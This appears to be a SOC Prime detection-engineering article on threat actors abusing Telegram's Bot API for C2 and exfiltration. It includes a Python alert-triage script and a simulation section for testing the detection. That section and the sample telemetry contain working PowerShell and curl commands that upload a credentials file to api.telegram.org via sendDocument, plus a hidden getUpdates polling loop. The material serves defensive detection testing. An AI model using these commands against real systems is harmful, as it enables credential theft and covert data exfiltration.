SOC Prime Bias: Medium

17 Dec 2025 14:33 UTC

The Detection & Response Chronicles: Exploring Telegram Abuse

Ruslan Mikhalov, Chief of Threat Research at SOC Prime

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Summary

The article explains how several threat actors misuse Telegram’s Bot API and channels in enterprises for command and control, data exfiltration, and victim monitoring. Malware families including DeerStealer, Lumma Stealer, Raven Stealer, and a trojanized XWorm builder hard-code bot tokens or channel IDs and call endpoints such as /sendMessage and /sendDocument. It includes Microsoft Defender and Sentinel detection queries focused on suspicious process command lines and traffic to api.telegram.org. Key guidance is to baseline legitimate Telegram use and block the API where it isn’t needed.

Investigation

NVISO’s SOC reported four intrusion attempts observed between March 2025 and October 2025 in which Telegram was used at different points in the attack lifecycle. The write-up highlights campaigns such as Lunar Spider monitoring victims via fake captcha lures, DeerStealer sending operator notifications through curl, Lumma Stealer pulling C2 details from Telegram channels, Raven Stealer exfiltrating archived collections, and an XWorm builder relying on the Bot API for both exfiltration and C2. Analysts extracted indicators including process command lines, network destinations, and relevant file names.

Mitigation

Establish a baseline for legitimate Telegram usage, then block outbound access to api.telegram.org in environments where it is not required. Watch for uncommon processes (e.g., curl, powershell, wscript) initiating connections to the API and investigate any scripted Bot API interactions. Tune detections to suppress expected behavior such as known browsers launching telegram.exe, and prioritize long-polling or webhook-style requests originating from suspicious binaries or unexpected hosts.
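The mitigation guidance above amounts to a small triage rule: flag any process whose command line reaches api.telegram.org, drop the baselined Telegram client (and, as the article's rule does, anything telegram.exe launched), then rank what remains by which Bot API method is called and which process called it. The Python below is an added example written for this page, not SOC Prime or NVISO code. It runs that logic over a handful of constructed process-creation records shaped like Defender's DeviceProcessEvents columns (FileName, ProcessCommandLine, InitiatingProcessFileName, DeviceName). The bot tokens, hostnames and paths in the records are fabricated, the method-to-category table and the minimum secret length in the regex are assumptions, and the masked token in each alert is the handle you would carry into the Response steps (rotation if it is your own bot, reporting otherwise).

```python
import re
from dataclasses import dataclass
from typing import Optional

# Added example (not SOC Prime or NVISO code). Records mimic the Defender
# DeviceProcessEvents columns the article's queries key on; every event below
# is constructed for illustration.

TELEGRAM_HOST = "api.telegram.org"

# Bot API calls look like https://api.telegram.org/bot<id>:<secret>/<method>.
# The 20-character minimum for the secret is an assumption for this example.
BOT_CALL_RE = re.compile(
    r"api\.telegram\.org/bot(\d+:[A-Za-z0-9_-]{20,})/([A-Za-z]+)", re.IGNORECASE
)

# What each method usually means in the intrusions described above (assumed mapping).
METHOD_CATEGORY = {
    "senddocument": "exfiltration",
    "sendmessage": "operator-notification",
    "getupdates": "c2-long-polling",
    "setwebhook": "c2-webhook",
}
HIGH_RISK = {"exfiltration", "c2-long-polling", "c2-webhook"}

# Assumed baseline: the desktop client is the only process expected to reach
# Telegram; the rule's telegram.exe parent filter is reproduced as well.
BASELINE_PROCESSES = {"telegram.exe"}

# Scripting hosts and LOLBins that have no business scripting the Bot API.
SCRIPT_HOSTS = {"curl.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "certutil.exe", "bitsadmin.exe"}


@dataclass
class Alert:
    device: str
    process: str
    parent: str
    method: str
    category: str
    masked_token: str   # identifies the bot in a ticket without re-exposing the secret
    severity: str


def mask_token(token: str) -> str:
    """Keep the bot id and the edges of the secret, e.g. 1:abcd...efgh."""
    bot_id, secret = token.split(":", 1)
    return f"{bot_id}:{secret[:4]}...{secret[-4:]}"


def triage_event(ev: dict) -> Optional[Alert]:
    cmd = ev.get("ProcessCommandLine", "")
    if TELEGRAM_HOST not in cmd.lower():
        return None
    proc = ev.get("FileName", "").lower()
    parent = ev.get("InitiatingProcessFileName", "").lower()
    # Suppress the baselined client and anything it launches.
    if proc in BASELINE_PROCESSES or parent in BASELINE_PROCESSES:
        return None
    m = BOT_CALL_RE.search(cmd)
    if m:
        method = m.group(2).lower()
        category = METHOD_CATEGORY.get(method, "other-bot-api")
        masked = mask_token(m.group(1))
    else:
        method, category, masked = "", "host-contact-only", ""
    if category in HIGH_RISK:
        severity = "high"
    elif m or proc in SCRIPT_HOSTS:
        severity = "medium"
    else:
        severity = "low"
    return Alert(ev.get("DeviceName", "?"), proc, parent, method, category, masked, severity)


def triage(events):
    """Return the alerts that survive the baseline filter, in input order."""
    return [a for a in (triage_event(e) for e in events) if a]


# Constructed telemetry; tokens, hosts and paths are fake. Records 1, 3 and 4
# should alert, record 2 is suppressed by the baseline, record 5 never touches Telegram.
SAMPLE_EVENTS = [
    {"DeviceName": "ws-fin-07", "FileName": "curl.exe",
     "InitiatingProcessFileName": "powershell.exe",
     "ProcessCommandLine": r'curl.exe -X POST -F "document=@C:\Temp\creds.txt" '
                           r'https://api.telegram.org/bot123456:ABC-DEF1234ghIkl-zyx57W2v1u123ew11/sendDocument?chat_id=987654321'},
    {"DeviceName": "ws-fin-07", "FileName": "Telegram.exe",
     "InitiatingProcessFileName": "chrome.exe",
     "ProcessCommandLine": r'"C:\Users\alice\AppData\Roaming\Telegram Desktop\Telegram.exe" -- https://api.telegram.org/'},
    {"DeviceName": "ws-hr-12", "FileName": "powershell.exe",
     "InitiatingProcessFileName": "explorer.exe",
     "ProcessCommandLine": "powershell.exe -nop -w hidden -c \"while($true){Invoke-RestMethod "
                           "'https://api.telegram.org/bot7777777777:AAEfakeTokenForExampleOnly_0123456789/getUpdates?offset=-1';Start-Sleep 30}\""},
    {"DeviceName": "ws-hr-12", "FileName": "wscript.exe",
     "InitiatingProcessFileName": "winword.exe",
     "ProcessCommandLine": r"wscript.exe //B C:\Users\bob\AppData\Local\Temp\notify.vbs "
                           r"https://api.telegram.org/bot5555555555:BBFconstructedExampleToken_abcdefghij/sendMessage?chat_id=42&text=online"},
    {"DeviceName": "ws-hr-12", "FileName": "svchost.exe",
     "InitiatingProcessFileName": "services.exe",
     "ProcessCommandLine": "svchost.exe -k netsvcs -p"},
]

if __name__ == "__main__":
    for a in triage(SAMPLE_EVENTS):
        print(f"[{a.severity}] {a.device}: {a.parent} -> {a.process} "
              f"{a.method or '-'} ({a.category}) token={a.masked_token or '-'}")
```

The suppression deliberately keys on process names, which is what the article's rule does; a practitioner tuning this for production would add the device or user baseline from the first mitigation step, since an attacker can rename a dropped binary to telegram.exe.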

Response

When activity is detected, isolate the affected endpoint, stop the suspicious processes, and preserve their command-line arguments along with DNS, proxy, and network telemetry; the command line is usually where the bot token, chat ID and API method are recorded. Perform deeper forensics to identify follow-on payloads associated with campaigns like DeerStealer or Raven Stealer. Rotate any of the organization's own bot tokens that were exposed; attacker-controlled bots and channels cannot be revoked from the victim side, so contain the spread by blocking the related indicators and, once abuse is confirmed, report the bot and channel through Telegram's official channels. Document the incident for recurrence prevention.

Attack Flow

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.

  • Attack Narrative & Commands:
    An adversary with a compromised Windows host wishes to exfiltrate a harvested credential file (creds.txt) to a Telegram bot they control. To avoid dropping a custom binary, they use the curl.exe that ships with Windows 10 version 1803 and later to POST the file to https://api.telegram.org/bot<ATTACKER_TOKEN>/sendDocument. The command is executed from PowerShell, so the process creation event for curl.exe records a command line that contains “api.telegram.org”. Because the initiating process is powershell.exe rather than telegram.exe, the rule’s filter (InitiatingProcessFileName: "telegram.exe") does not suppress the alert.

    # Variables (replace with attacker-controlled values)
    $BotToken = "123456:ABC-DEF1234ghIkl-zyx57W2v1u123ew11"
    $ChatID   = "987654321"
    $FilePath = "C:\Temp\creds.txt"
    
    # Ensure the directory and file exist (simulated credential dump)
    New-Item -ItemType Directory -Path (Split-Path $FilePath) -Force | Out-Null
    Set-Content -Path $FilePath -Value "username: admin`npassword: P@ssw0rd!"
    
    # Execute the exfiltration via the Telegram Bot API; -F sends a multipart POST
    # and the full URL lands in curl.exe's command line in the process creation event
    $Url = "https://api.telegram.org/bot$BotToken/sendDocument?chat_id=$ChatID"
    curl.exe -X POST -F "document=@$FilePath" $Url
  • Regression Test Script: The script below reproduces the exact steps, suitable for automated BAS runs.

    #--------------------------------------------
    # Regression Test – Telegram API Exfiltration
    #--------------------------------------------
    param(
        [string]$BotToken = "REPLACE_WITH_TOKEN",
        [string]$ChatID   = "REPLACE_WITH_CHATID",
        [string]$TmpDir   = "$env:TEMP\TelegramBAS"
    )
    
    # Create temp workspace
    New-Item -ItemType Directory -Path $TmpDir -Force | Out-Null
    
    # Simulated credential file
    $CredFile = Join-Path $TmpDir "creds.txt"
    "username: admin`npassword: P@ssw0rd!" | Set-Content -Path $CredFile
    
    # Build API URL
    $Url = "https://api.telegram.org/bot$BotToken/sendDocument?chat_id=$ChatID"
    
    # Invoke exfiltration and capture the Bot API JSON reply (-s silences the progress meter)
    Write-Host "[*] Exfiltrating $CredFile to Telegram..."
    $Response = (curl.exe -s -X POST -F "document=@$CredFile" $Url) -join ''
    
    # A non-zero exit code means no request left the host, so no telemetry was generated
    if ($LASTEXITCODE -ne 0) {
        Write-Error "[-] curl.exe failed (exit code $LASTEXITCODE); no API request was sent."
        exit 1
    }
    
    # The process creation event exists at this point regardless of the reply;
    # Telegram answers {"ok":true,...} only when the token, chat and egress path are live
    $Delivered = $false
    try { $Delivered = [bool](($Response | ConvertFrom-Json).ok) } catch { }
    if ($Delivered) {
        Write-Host "[+] Exfiltration delivered; detection telemetry generated."
    } else {
        Write-Warning "[!] Request sent (telemetry generated) but delivery not confirmed: $Response"
    }
  • Cleanup Commands: Remove the temporary file and directory; optionally terminate any lingering curl.exe processes.

    # Cleanup temporary artifacts ($TmpDir matches the regression script default)
    $TmpDir = "$env:TEMP\TelegramBAS"
    Stop-Process -Name "curl" -ErrorAction SilentlyContinue
    Remove-Item -Path $TmpDir -Recurse -Force -ErrorAction SilentlyContinue
    # Also remove the file created in the narrative walkthrough, if present
    Remove-Item -Path "C:\Temp\creds.txt" -Force -ErrorAction SilentlyContinue
    Write-Host "[*] Cleanup complete."